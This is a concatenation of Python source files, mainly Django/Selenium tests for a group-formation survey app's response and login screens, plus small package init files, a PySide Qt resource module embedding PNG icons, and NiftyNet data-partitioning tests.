self.assertContains(response, "Front-End")
self.assertContains(response, "Dog Lover")
# The second GroupFormer intentionally does not have any attributes
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Back-End")
self.assertNotContains(response, "Front-End")
self.assertNotContains(response, "Dog Lover")
def test_displays_without_projects_or_attributes(self):
"""
Check if the form still displays despite no projects and attributes created
"""
gfs = create_sample_groupformer()
create_sample_participants(gfs)
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)

    def test_displays_participants(self):
        """
        Test that the form lists EVERY participant in the preference selection box
        """
        gfs = create_sample_groupformer()
        names = create_sample_participants(gfs)
        self.login_to_sample_groupformer()

        response1 = self.client.get(reverse('response_screen:response_screen', args=(1,)))
        response2 = self.client.get(reverse('response_screen:response_screen', args=(2,)))
        for name in names:
            self.assertContains(response1, name)
            self.assertContains(response2, name)


class SeleniumResponseScreen(LiveServerTestCase):
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.selenium = WebDriver()
        cls.selenium.implicitly_wait(1)

    @classmethod
    def tearDownClass(cls):
        cls.selenium.quit()
        super().tearDownClass()

    def login_to_sample_groupformer(self, groupformer_id):
        self.selenium.get(self.live_server_url + reverse('response_screen:login', kwargs={'groupformer_id': groupformer_id}))
        self.selenium.find_element_by_id('email').send_keys("Kristian@email.com")
        self.selenium.find_element_by_id('login-submit').click()
        # Should be redirected to response screen
        self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{groupformer_id}"))

    def test_missing_projects_preference(self):
        """
        Test that the error message shows if the user does not input a preference for a project.
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        # Test for the first groupformer object
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Select a preference for only the first project
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
        # Skip the second project to trigger the missing-preference error
        # self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()

        # Select preferences for all attributes
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        error_message = self.selenium.find_element_by_xpath("//div[@id='projForm{}_error']".format(gfs[1]['p2'].pk))
        # Using .text instead of .get_attribute("innerHTML") because innerHTML still contains the error even when it is
        # hidden on display; .text only shows what the user sees (ignores any `display: hidden` text)
        self.assertTrue("Must select a preference for this project." in error_message.text)

    def test_missing_attributes_preference(self):
        """
        Test that the error message shows if the user does not input a preference for an attribute.
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        # Test for the first groupformer object
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Select preferences for both projects
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()

        # Select preferences for the first two attributes
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        # Skip the third attribute to trigger the missing-preference error
        # self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        error_message = self.selenium.find_element_by_xpath("//div[@id='attrForm{}_error']".format(gfs[1]['a3'].pk))
        # Using .text instead of .get_attribute("innerHTML") because innerHTML still contains the error even when it is
        # hidden on display; .text only shows what the user sees (ignores any `display: hidden` text)
        self.assertTrue("Must select a preference for this attribute." in error_message.text)

    def test_missing_user_info(self):
        """
        Test that error messages show when the user submits without filling in any project preferences.
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        # Test for the first groupformer object
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Skip both project preferences to trigger the missing errors
        # self.selenium.find_element_by_xpath("//select[@id='projForm1']/option[text()='Very Interested']").click()
        # self.selenium.find_element_by_xpath("//select[@id='projForm2']/option[text()='PLEASE NO']").click()

        # Select preferences for all attributes
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        proj1_error_message = self.selenium.find_element_by_id(f"projForm{gfs[1]['p1'].pk}_error")
        proj2_error_message = self.selenium.find_element_by_id(f"projForm{gfs[1]['p2'].pk}_error")
        # Using .text instead of .get_attribute("innerHTML") because innerHTML still contains the error even when it is
        # hidden on display; .text only shows what the user sees (ignores any `display: hidden` text)
        self.assertTrue("Must select a preference for this project." in proj1_error_message.text)
        self.assertTrue("Must select a preference for this project." in proj2_error_message.text)

    def test_missing_participant(self):
        """
        Test that the form still successfully submits on missing participants (it is not a required input)
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        # Test for the first groupformer object
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Select preferences for both projects
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()

        # Select preferences for all attributes
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select no students
        # self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        # self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        # self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        # # Currently, the form is set to post parameters in the URL.
        # url = self.selenium.current_url
        # # Isolate the parameters of the POSTed form
        # param_url = url.rsplit('?', 1)[1]
        # params = param_url.split("&")
        # for i in range(len(params)):
        #     # Replace symbol placeholders with correct character
        #     params[i] = params[i].replace("%20", " ")
        #     params[i] = params[i].replace("+", " ")
        #     params[i] = params[i].replace("%40", "@")
        #     # Create name, value pairs
        #     params[i] = tuple(params[i].split("="))
        #
        # # For each attribute form, the homogenous/continuous values are a hidden form retrieved from the model.
        # # Check if those attributes carried over the correct values for those model objects.
        # self.assertEqual(len(params), 6)  # Check that only the following 5 tuples exist (plus CSRF token)
        # self.assertTrue(('projForm{}_preference'.format(gfs[1]['p1'].pk), '5') in params)
        # self.assertTrue(('projForm{}_preference'.format(gfs[1]['p2'].pk), '1') in params)
        # self.assertTrue(('attrForm{}_preference'.format(gfs[1]['a1'].pk), '4') in params)
        # self.assertTrue(('attrForm{}_preference'.format(gfs[1]['a2'].pk), '2') in params)
        # self.assertTrue(('attrForm{}_preference'.format(gfs[1]['a3'].pk), '5') in params)

        self.assertEqual(len(project_selection.objects.all()), 2)
        self.assertEqual(len(attribute_selection.objects.all()), 3)
        self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p1']).value, 5)
        self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p2']).value, 1)
        self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a1']).value, 4)
        self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a2']).value, 2)
        self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a3']).value, 5)

    def test_fill_response_screen(self):
        """
        Test filling in and submitting the full response form for both groupformer objects
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        gfs2 = gfs[2]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        #########################################
        # Test for the first groupformer object #
        #########################################
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Select preferences for both projects
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()

        # Select preferences for all attributes
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        self.assertEqual(len(project_selection.objects.all()), 2)
        self.assertEqual(len(attribute_selection.objects.all()), 3)
        self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p1']).value, 5)
        self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p2']).value, 1)
        self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a1']).value, 4)
        self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a2']).value, 2)
        self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a3']).value, 5)
        self.assertSetEqual({'Min', 'Kristian', 'Ben'}, {x.part_name for x in gfs[1]['part2'].desired_partner.all()})

        ##########################################
        # Test for the second groupformer object #
        ##########################################
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs2}))

        # Select preferences for both projects
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Neutral']".format(gfs[2]['p1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Somewhat Interested']".format(gfs[2]['p2'].pk)).click()

        # Select preferences for all attributes (this groupformer has none)

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Sarah']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kyle']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Morgan']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        # # Currently, the form is set to post parameters in the URL.
        # url = self.selenium.current_url
        # # Isolate the parameters of the POSTed form
        # param_url = url.rsplit('?', 1)[1]
        # params = param_url.split("&")
        # for i in range(len(params)):
        #     # Replace symbol placeholders with correct character
        #     params[i] = params[i].replace("%20", " ")
        #     params[i] = params[i].replace("+", " ")
        #     params[i] = params[i].replace("%40", "@")
        #     # Create name, value pairs
        #     params[i] = tuple(params[i].split("="))
        #
        # # Attributes do not exist on this Groupformer instance, do not check for them
        # self.assertEqual(len(params), 6)  # Check that only the following 5 tuples exist (plus CSRF token)
        # self.assertTrue(('projForm{}_preference'.format(gfs[2]['p1'].pk), '3') in params)
        # self.assertTrue(('projForm{}_preference'.format(gfs[2]['p2'].pk), '4') in params)
        # self.assertTrue(('participantForm_preference', 'Sarah') in params)
        # self.assertTrue(('participantForm_preference', 'Kyle') in params)
        # self.assertTrue(('participantForm_preference', 'Morgan') in params)

        self.assertEqual(len(project_selection.objects.all()), 4)
        self.assertEqual(len(attribute_selection.objects.all()), 3)
        self.assertEqual(gfs[2]['part2'].getProjectChoice(gfs[2]['p1']).value, 3)
        self.assertEqual(gfs[2]['part2'].getProjectChoice(gfs[2]['p2']).value, 4)
        self.assertSetEqual({'Sarah', 'Kyle', 'Morgan'}, {x.part_name for x in gfs[2]['part2'].desired_partner.all()})

    def test_modal_shows_success(self):
        """
        Test that the modal shows on successful submission
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        #########################################
        # Test for the first groupformer object #
        #########################################
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Select preferences for both projects
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()

        # Select preferences for all attributes
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
        sleep(1)

        # Check the Modal
        # .text only grabs VISIBLE text
        modal_content = self.selenium.find_element_by_xpath("//div[@id='submitSuccessModalContent']").text

        # Project preferences
        self.assertTrue(gfs[1]['p1'].project_name in modal_content)
        self.assertTrue("5" in modal_content)
        self.assertTrue(gfs[1]['p2'].project_name in modal_content)
        self.assertTrue("1" in modal_content)

        # Attribute preferences
        self.assertTrue(gfs[1]['a1'].attr_name in modal_content)
        self.assertTrue("4" in modal_content)
        self.assertTrue(gfs[1]['a2'].attr_name in modal_content)
        self.assertTrue("2" in modal_content)
        self.assertTrue(gfs[1]['a3'].attr_name in modal_content)
        self.assertTrue("5" in modal_content)

        # Participants listed
        self.assertTrue("Kristian" in modal_content)
        self.assertTrue("Min" in modal_content)
        self.assertTrue("Ben" in modal_content)

    def test_modal_shows_failure(self):
        """
        Test that the modal does not show if the submission was a failure
        """
        gfs = create_all_samples()
        # ID is necessary because each Selenium test does not create its own isolated DB for models
        gfs1 = gfs[1]['gf'].id
        self.login_to_sample_groupformer(gfs1)

        #########################################
        # Test for the first groupformer object #
        #########################################
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))

        # Select preferences for both projects
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()

        # Select preferences for all attributes except the second, to force a failed submission
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
        # self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
        self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()

        # Select a few students
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
        self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()

        # Submit
        self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()

        # Check the Modal
        # .text only grabs VISIBLE text
        modal_title = self.selenium.find_element_by_xpath("//h5[@id='submitSuccessModalLabel']").text
        self.assertFalse("Your response has been submitted!" in modal_title)


from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.common.exceptions import NoSuchElementException

from dbtools.models import *


class LoginScreenTest(StaticLiveServerTestCase):
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.selenium = WebDriver()
        cls.selenium.implicitly_wait(1)

    @classmethod
    def tearDownClass(cls):
        cls.selenium.quit()
        super().tearDownClass()

    def setUp(self):
        User.objects.create_user("bjohn", "bjohn@umbc.edu", "eYnNtTBH")
        self.gf = addGroupFormer("Ben Johnson", "bjohn@umbc.edu", "CMSC 447-01")
        self.gf.addParticipant("John Beachy", "johnny@niu.edu")

    def test_login(self):
        self.selenium.get(self.live_server_url + reverse('response_screen:login', kwargs={'groupformer_id': self.gf.pk}))

        # No alert on first look
        with self.assertRaises(NoSuchElementException):
            alert = self.selenium.find_element_by_id('bad-email')

        email = self.selenium.find_element_by_id('email')
        email.send_keys("nonsense@non.sense")
        submit = self.selenium.find_element_by_id('login-submit')
        submit.click()

        # Once an incorrect email is entered, an alert is shown
        alert = self.selenium.find_element_by_id('bad-email')

        email = self.selenium.find_element_by_id('email')
        email.send_keys("johnny@niu.edu")
        submit = self.selenium.find_element_by_id('login-submit')
        submit.click()

        # Should be redirected to response screen
        self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}"))

    def test_redirect_login(self):
        self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': self.gf.pk}))
        # Should be redirected to login screen
        self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}/login"))

        email = self.selenium.find_element_by_id('email')
        email.send_keys("johnny@niu.edu")
        submit = self.selenium.find_element_by_id('login-submit')
        submit.click()

        # Should be redirected to response screen
        self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}"))

    def test_login_logout_sequence(self):
        self.selenium.get(self.live_server_url + reverse('response_screen:login', kwargs={'groupformer_id': self.gf.pk}))
        email = self.selenium.find_element_by_id('email')
        email.send_keys("johnny@niu.edu")
        submit = self.selenium.find_element_by_id('login-submit')
        submit.click()

        # Should be redirected to response screen
        self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}"))

        self.selenium.find_element_by_id('logout-link').click()
        # Logging out redirects to login afterwards
        self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}/login"))
# ---- vnpy/api/bitfinex/__init__.py (repo: black0144/vnpy, license: MIT) ----
from .vnbitfinex import BitfinexApi
# ---- src/ml_commons/layers/__init__.py (repo: pekalam/ml_commons, license: MIT) ----
from .channelwise_dense.channelwise_dense import ChannelwiseDense
from .unpool.unpool import Unpool
# ---- mlcl/datasets/__init__.py (repo: tmplxz/carelabels, license: MIT) ----
from .base import DatasetBase
# ---- Lib/site-packages/PySide/examples/widgets/tooltips/tooltips_rc.py (repo: heylenz/python27, licenses: bzip2-1.0.6, MIT) ----
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: to syyskuuta 2 17:22:34 2010
# by: The Resource Compiler for PyQt (Qt v4.7.0)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore

qt_resource_data = "\
\x00\x00\x00\xaa\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x00\x71\x49\x44\x41\x54\x58\xc3\xed\xce\x4b\x0a\x80\x30\
\x10\x04\xd1\x1c\xd3\x23\x7a\xcb\x11\x82\xb8\x50\x62\x92\xf9\xd5\
\x66\x1a\x7a\x5d\xaf\xb5\x5a\xcd\x36\xb9\xcf\xc4\x8f\x53\xfa\x09\
\xc4\x13\xa7\x10\x28\xe0\x13\xcf\x44\x0c\xe3\x59\x08\x14\x30\x8d\
\x47\x23\x50\xc0\x72\x3c\x02\xb1\x1d\xf7\x46\xa0\x00\x75\xdc\x03\
\x61\x8e\x5b\x11\x28\xc0\x2d\xae\x45\xa0\x00\xf7\xf8\x0e\x22\x2c\
\xbe\x8a\x40\x01\xe1\xf1\x3f\x44\x5a\x7c\x84\x40\x01\xe9\xf1\x37\
\x42\xe0\xd7\xd8\x5d\x0f\x6f\x97\x11\x88\x38\xa9\x1e\x00\x00\x00\
\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x00\x5e\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x01\x03\x00\x00\x00\x49\xb4\xe8\xb7\
\x00\x00\x00\x06\x50\x4c\x54\x45\x00\x00\x00\x58\xa8\xff\x8c\x14\
\x1f\xab\x00\x00\x00\x13\x49\x44\x41\x54\x08\xd7\x63\x60\x00\x81\
\xfa\xff\xff\xff\x0d\x3e\x02\x04\x00\x8d\x4d\x68\x6b\xcf\xb8\x8e\
\x86\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x00\xa5\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x00\x6c\x49\x44\x41\x54\x58\xc3\xed\xd7\x5b\x0e\x00\x10\
\x0c\x44\x51\xcb\xb4\x44\xbb\x64\x03\x1e\xd5\x18\x1d\x31\x12\xdf\
\xf7\x7c\xd1\xa6\xf4\xe8\xa9\x93\x8b\x8f\xe6\x52\x87\x17\x81\x59\
\x46\x0d\x18\x7f\xdc\x13\x1e\x40\x62\xe2\x5e\xc4\xd1\xf8\x2e\x02\
\x12\xb7\x22\xa0\x71\x0b\x22\x14\x70\x25\x3e\x43\xfc\x0d\xb8\x1a\
\xef\x21\x04\x10\x40\x00\x3d\x44\x14\x00\x7d\xc7\x14\x13\x11\xc5\
\x4c\x48\x31\x15\x53\xec\x05\x14\x9b\x11\xc5\x6e\x08\xdd\x8e\x1b\
\x14\x54\x19\xf3\xa1\x23\xdb\xd5\x00\x00\x00\x00\x49\x45\x4e\x44\
\xae\x42\x60\x82\
"
qt_resource_name = "\
\x00\x06\
\x07\x03\x7d\xc3\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x73\
\x00\x0c\
\x05\x59\xa7\xc7\
\x00\x74\
\x00\x72\x00\x69\x00\x61\x00\x6e\x00\x67\x00\x6c\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0a\
\x08\x8b\x06\x27\
\x00\x73\
\x00\x71\x00\x75\x00\x61\x00\x72\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0a\
\x0a\x2d\x16\x47\
\x00\x63\
\x00\x69\x00\x72\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\
\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x30\x00\x00\x00\x00\x00\x01\x00\x00\x00\xae\
\x00\x00\x00\x4a\x00\x00\x00\x00\x00\x01\x00\x00\x01\x10\
"
def qInitResources():
    QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)


def qCleanupResources():
    QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)


qInitResources()
# ---- models/__init__.py (repo: pratyaksh10/TPSNet, license: MIT) ----
from .basic_block import *
from .resnet import *
# ---- tests/driver_partitioner_test.py (repo: elias-1/NiftyNet, license: Apache-2.0) ----
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function

import os

import tensorflow as tf

from niftynet.engine.application_driver import ApplicationDriver
from niftynet.utilities.util_common import ParserNamespace

TARGET_FILE = os.path.join('testing_data', 'test_splitting.csv')


def _generate_base_params():
    # initialise compulsory params that are irrelevant
    # to this unit test
    user_param = dict()
    user_param['SYSTEM'] = ParserNamespace(
        model_dir='./testing_data',
        num_threads=2,
        num_gpus=1,
        cuda_devices='')
    user_param['NETWORK'] = ParserNamespace(
        batch_size=20,
        name='tests.toy_application.TinyNet')
    user_param['TRAINING'] = ParserNamespace(
        starting_iter=0,
        max_iter=2,
        save_every_n=2,
        tensorboard_every_n=0,
        max_checkpoints=100)
    user_param['INFERENCE'] = ParserNamespace(
        inference_iter=-1)
    user_param['CUSTOM'] = ParserNamespace(
        name='tests.toy_application.ToyApplication',
        vector_size=100,
        mean=10.0,
        stddev=2.0)
    return user_param
def _generate_data_param():
user_param = dict()
user_param['modality'] = ParserNamespace(
csv_file=os.path.join('testing_data', 'mod1test.csv'),
path_to_search='testing_data')
user_param['modality2'] = ParserNamespace(
csv_file=os.path.join('testing_data', 'mod2test.csv'),
path_to_search='testing_data')
return user_param
def generate_input_params(**arg_dicts):
user_param = _generate_base_params()
for key in list(arg_dicts):
if not arg_dicts[key]:
continue
user_param[key].update(**arg_dicts[key])
return user_param
def clear_target():
if not os.path.isfile(TARGET_FILE):
return
os.remove(TARGET_FILE)
def write_target():
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 2,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
assert os.path.isfile(TARGET_FILE)
return
class DriverPartitionerTestExistingFile(tf.test.TestCase):
def test_training(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 2,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_training_no_validation(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_inference_no_validation(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_inference_validation(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 10,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
